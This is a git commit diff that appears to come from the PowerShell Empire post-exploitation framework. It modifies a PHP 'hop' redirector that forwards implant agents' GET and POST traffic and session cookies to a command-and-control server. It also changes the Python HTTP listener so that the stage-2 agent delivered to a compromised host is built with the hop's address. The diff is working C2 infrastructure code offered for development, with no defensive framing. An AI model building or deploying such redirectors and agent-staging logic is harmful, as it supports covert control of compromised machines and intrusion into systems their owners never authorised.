parent
619ae2c132
commit
6c3f51aca9
|
@ -1,18 +1,22 @@
|
||||||
<?php
|
<?php
|
||||||
|
|
||||||
$server = rtrim("REPLACE_SERVER", '/');
|
$server = rtrim("REPLACE_SERVER", '/');
|
||||||
|
$hopName = "REPLACE_HOP_NAME";
|
||||||
|
|
||||||
|
|
||||||
function do_get_request($url, $optionalHeaders = null)
|
function do_get_request($url, $optionalHeaders = null)
|
||||||
{
|
{
|
||||||
|
global $hopName;
|
||||||
$aContext = array(
|
$aContext = array(
|
||||||
'http' => array(
|
'http' => array(
|
||||||
'method' => 'GET'
|
'method' => 'GET'
|
||||||
),
|
),
|
||||||
);
|
);
|
||||||
|
$headers = array('Hop-Name' => $hopName);
|
||||||
if ($optionalHeaders !== null) {
|
if ($optionalHeaders !== null) {
|
||||||
$aContext['http']['header'] = $optionalHeaders;
|
$headers['Cookie'] = $optionalHeaders;
|
||||||
}
|
}
|
||||||
|
$aContext['http']['header'] = prepareHeaders($headers);
|
||||||
$cxContext = stream_context_create($aContext);
|
$cxContext = stream_context_create($aContext);
|
||||||
echo file_get_contents($url, False, $cxContext);
|
echo file_get_contents($url, False, $cxContext);
|
||||||
}
|
}
|
||||||
|
@ -20,13 +24,16 @@ function do_get_request($url, $optionalHeaders = null)
|
||||||
|
|
||||||
function do_post_request($url, $data, $optionalHeaders = null)
|
function do_post_request($url, $data, $optionalHeaders = null)
|
||||||
{
|
{
|
||||||
|
global $hopName;
|
||||||
$params = array('http' => array(
|
$params = array('http' => array(
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'content' => $data
|
'content' => $data
|
||||||
));
|
));
|
||||||
|
$headers = array('Hop-Name' => $hopName);
|
||||||
if ($optionalHeaders !== null) {
|
if ($optionalHeaders !== null) {
|
||||||
$params['http']['header'] = $optionalHeaders;
|
$headers['Cookie'] = $optionalHeaders;
|
||||||
}
|
}
|
||||||
|
$params['http']['header'] = prepareHeaders($headers);
|
||||||
$ctx = stream_context_create($params);
|
$ctx = stream_context_create($params);
|
||||||
$fp = @fopen($url, 'rb', false, $ctx);
|
$fp = @fopen($url, 'rb', false, $ctx);
|
||||||
if (!$fp) {
|
if (!$fp) {
|
||||||
|
@ -39,11 +46,24 @@ function do_post_request($url, $data, $optionalHeaders = null)
|
||||||
echo $response;
|
echo $response;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
function prepareHeaders($headers) {
|
||||||
|
$flattened = array();
|
||||||
|
|
||||||
|
foreach ($headers as $key => $header) {
|
||||||
|
if (is_int($key)) {
|
||||||
|
$flattened[] = $header;
|
||||||
|
} else {
|
||||||
|
$flattened[] = $key.': '.$header;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return implode("\r\n", $flattened);
|
||||||
|
}
|
||||||
|
|
||||||
if ($_SERVER['REQUEST_METHOD'] === 'GET') {
|
if ($_SERVER['REQUEST_METHOD'] === 'GET') {
|
||||||
$requestURI = $_SERVER['REQUEST_URI'];
|
$requestURI = $_SERVER['REQUEST_URI'];
|
||||||
if(isset($_COOKIE['session'])) {
|
if(isset($_COOKIE['session'])) {
|
||||||
return do_get_request($server.$requestURI, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session']));
|
return do_get_request($server.$requestURI, "session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
return do_get_request($server.$requestURI);
|
return do_get_request($server.$requestURI);
|
||||||
|
@ -56,7 +76,7 @@ else {
|
||||||
$postdata = file_get_contents("php://input");
|
$postdata = file_get_contents("php://input");
|
||||||
|
|
||||||
if(isset($_COOKIE['session'])) {
|
if(isset($_COOKIE['session'])) {
|
||||||
return do_post_request($server.$requestURI, $postdata, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session']));
|
return do_post_request($server.$requestURI, $postdata, "session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
return do_post_request($server.$requestURI, $postdata);
|
return do_post_request($server.$requestURI, $postdata);
|
||||||
|
|
|
@ -747,8 +747,16 @@ def send_message(packets=None):
|
||||||
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
|
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
|
||||||
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
|
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
|
||||||
|
|
||||||
|
hopListenerName = request.headers.get('Hop-Name')
|
||||||
|
try:
|
||||||
|
hopListener = helpers.get_listener_options(hopListenerName)
|
||||||
|
tempListenerOptions = copy.deepcopy(listenerOptions)
|
||||||
|
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
|
||||||
|
except TypeError:
|
||||||
|
tempListenerOptions = listenerOptions
|
||||||
|
|
||||||
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
|
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
|
||||||
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions)
|
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions)
|
||||||
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
|
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
|
||||||
# TODO: wrap ^ in a routing packet?
|
# TODO: wrap ^ in a routing packet?
|
||||||
|
|
||||||
|
|
|
@ -440,6 +440,7 @@ def send_message(packets=None):
|
||||||
f.close()
|
f.close()
|
||||||
|
|
||||||
hopCode = hopCode.replace('REPLACE_SERVER', redirectHost)
|
hopCode = hopCode.replace('REPLACE_SERVER', redirectHost)
|
||||||
|
hopCode = hopCode.replace('REPLACE_HOP_NAME', self.options['Name']['Value'])
|
||||||
|
|
||||||
saveFolder = self.options['OutFolder']['Value']
|
saveFolder = self.options['OutFolder']['Value']
|
||||||
for uri in uris:
|
for uri in uris:
|
||||||
|
|
Loading…
Reference in New Issue